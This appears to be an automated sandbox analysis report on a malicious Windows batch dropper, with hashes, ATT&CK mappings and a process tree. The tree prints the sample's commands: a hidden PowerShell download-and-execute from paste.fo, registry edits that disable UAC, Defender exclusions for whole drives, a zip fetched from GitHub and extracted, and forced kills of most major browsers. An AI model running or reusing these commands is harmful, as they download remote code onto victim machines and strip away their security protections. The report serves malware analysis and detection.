Analysis
  max time kernel: 122s
  max time network: 123s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 31/12/2024, 03:08
Static task: static1

Behavioral task: behavioral1
  Sample: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
  Resource: win10v2004-20241007-en
General
  Target: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
  Size: 41KB
  MD5: 6b9cf24f2b691606642bd18bf2227a62
  SHA1: 046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
  SHA256: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
  SHA512: db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
  SSDEEP: 768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
Malware Config
  Extracted: https://paste.fo/raw/a1af5a4d0301
Signatures

UAC bypass 3 IoCs
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe

Blocklisted process makes network request 1 IoCs
  flow | pid | Process
  5 | 2068 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
  Runs PowerShell with a hidden display window.
  pid | Process
  2068 | powershell.exe
  2832 | powershell.exe
  1936 | powershell.exe
  1452 | powershell.exe
  2908 | powershell.exe
  2488 | powershell.exe
  2976 | powershell.exe
  1316 | powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
  Possibly turns off User Account Control's privilege elevation for standard users.
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" | reg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  flow | ioc
  7 | raw.githubusercontent.com
  9 | raw.githubusercontent.com
  10 | raw.githubusercontent.com
  15 | raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE
Delays execution with timeout.exe 2 IoCs
  pid | Process
  1600 | timeout.exe
  2788 | timeout.exe

Kills process with taskkill 12 IoCs
  pid | Process
  1392, 2288, 688, 1724, 2152, 1584, 2332, 1632, 780, 2140, 1068, 2336 | taskkill.exe

Modifies Internet Explorer settings 26 IoCs
  Every key below lies under \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer, abbreviated here as <IE>.
  description | ioc | Process
  Key created | <IE>\Recovery\PendingRecovery | iexplore.exe
  Set value (int) | <IE>\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
  Set value (int) | <IE>\SearchScopes\DownloadRetries = "2" | iexplore.exe
  Key created | <IE>\IntelliForms | iexplore.exe
  Key created | <IE>\LowRegistry\DOMStorage | iexplore.exe
  Key created | <IE>\Zoom | iexplore.exe
  Key created | <IE>\Recovery\AdminActive | iexplore.exe
  Set value (str) | <IE>\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
  Set value (str) | <IE>\Main\FullScreen = "no" | iexplore.exe
  Set value (data) | <IE>\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
  Set value (int) | <IE>\Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
  Key created | <IE>\Main | iexplore.exe
  Key created | <IE>\BrowserEmulation\LowMic | iexplore.exe
  Key created | <IE>\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
  Key created | <IE>\Toolbar | iexplore.exe
  Key created | <IE>\Main\WindowsSearch | iexplore.exe
  Key created | <IE>\SearchScopes | iexplore.exe
  Set value (int) | <IE>\Main\CompatibilityFlags = "0" | iexplore.exe
  Key created | <IE>\Main | IEXPLORE.EXE
  Key created | <IE>\GPU | iexplore.exe
  Key created | <IE>\IETld\LowMic | iexplore.exe
  Key created | <IE>\InternetRegistry | iexplore.exe
  Key created | <IE>\LowRegistry | iexplore.exe
  Key created | <IE>\Toolbar\WebBrowser | iexplore.exe
  Key created | <IE>\PageSetup | iexplore.exe
  Set value (int) | <IE>\Recovery\AdminActive\{8414F9E1-C724-11EF-833B-EE9D5ADBD8E3} = "0" | iexplore.exe
Modifies registry key 1 TTPs 12 IoCs
  pid | Process
  2632, 352, 1640, 2872, 2672, 2736, 2004, 2392, 2516, 2660, 2784, 1804 | reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs
  pid | Process | events
  2068 | powershell.exe | 1
  2832 | powershell.exe | 3
  1316 | powershell.exe | 1
  1936 | powershell.exe | 1
  1452 | powershell.exe | 1
  2908 | powershell.exe | 1
  2488 | powershell.exe | 1
  2976 | powershell.exe | 1

Suspicious use of AdjustPrivilegeToken 23 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 2068, 2832, 1316, 1936, 1452, 2908, 2488, 2976 | powershell.exe
  Token: SeRestorePrivilege | 2644 | 7z.exe
  Token: 35 | 2644 | 7z.exe
  Token: SeSecurityPrivilege | 2644 | 7z.exe
  Token: SeDebugPrivilege | 2332, 1632, 1392, 2288, 780, 2140, 688, 1068, 1724, 2336, 2152, 1584 | taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs
  pid | Process
  2636 | iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs
  pid | Process | events
  2636 | iexplore.exe | 2
  1484 | IEXPLORE.EXE | 4

Suspicious use of WriteProcessMemory 64 IoCs
  Each row collapses the identical repeated entries of the original listing; the "events" column gives how many times the write was recorded.
  pid | wrote to memory of | Process | procid_target | events
  2584 | 2412 | cmd.exe | 31 | 3
  2412 | 2068 | cmd.exe | 33 | 3
  2412 | 2832 | cmd.exe | 35 | 3
  2832 | 2332 | powershell.exe | 36 | 3
  2332 | 2872 | cmd.exe | 38 | 3
  2332 | 2672 | cmd.exe | 39 | 3
  2412 | 2636 | cmd.exe | 40 | 3
  2332 | 2736 | cmd.exe | 41 | 3
  2412 | 1600 | cmd.exe | 42 | 3
  2332 | 2660 | cmd.exe | 43 | 3
  2332 | 2784 | cmd.exe | 44 | 3
  2332 | 2632 | cmd.exe | 45 | 3
  2332 | 1804 | cmd.exe | 46 | 3
  2332 | 2004 | cmd.exe | 47 | 3
  2636 | 1484 | iexplore.exe | 48 | 4
  2332 | 352 | cmd.exe | 49 | 3
  2332 | 1640 | cmd.exe | 50 | 3
  2332 | 2392 | cmd.exe | 51 | 3
  2332 | 2516 | cmd.exe | 52 | 3
  2332 | 1316 | cmd.exe | 53 | 3
  2332 | 1936 | cmd.exe | 54 | 3
Processes
(Indentation shows process depth; each entry lists the image path, PID, command line, and the signatures that matched it.)

C:\Windows\system32\cmd.exe  (PID 2584)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  (PID 2412)
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2068)
      PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2832)
      powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat'))"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 2332)
        "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\reg.exe  (PID 2872)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2672)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
          - Hijack Execution Flow: Executable Installer File Permissions Weakness
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2736)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2660)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2784)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2632)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 1804)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2004)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 352)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 1640)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2392)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key

        C:\Windows\system32\reg.exe  (PID 2516)
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1316)
          PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1936)
          PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1452)
          PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2908)
          PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2488)
          PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2976)
          PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Program Files\Internet Explorer\iexplore.exe  (PID 2636)
      "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  (PID 1484)
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2636 CREDAT:275457 /prefetch:2
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx

    C:\Windows\system32\timeout.exe  (PID 1600)
      timeout /t 9
      - Delays execution with timeout.exe

    C:\Program Files\7-Zip\7z.exe  (PID 2644)
      "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\timeout.exe  (PID 2788)
      timeout /t 9
      - Delays execution with timeout.exe

    C:\Windows\system32\taskkill.exe  (PID 2332)
      taskkill /F /IM chrome.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 1632)
      taskkill /F /IM firefox.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 1392)
      taskkill /F /IM msedge.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 2288)
      taskkill /F /IM iexplore.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 780)
      taskkill /F /IM opera.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 2140)
      taskkill /F /IM safari.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 688)
      taskkill /F /IM brave.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 1068)
      taskkill /F /IM vivaldi.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 1724)
      taskkill /F /IM epic.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 2336)
      taskkill /F /IM yandex.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 2152)
      taskkill /F /IM tor.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe  (PID 1584)
      taskkill /F /IM CMD.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Hijack Execution Flow (1)
    Executable Installer File Permissions Weakness (1)

Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Hijack Execution Flow (1)
    Executable Installer File Permissions Weakness (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (3)
Downloads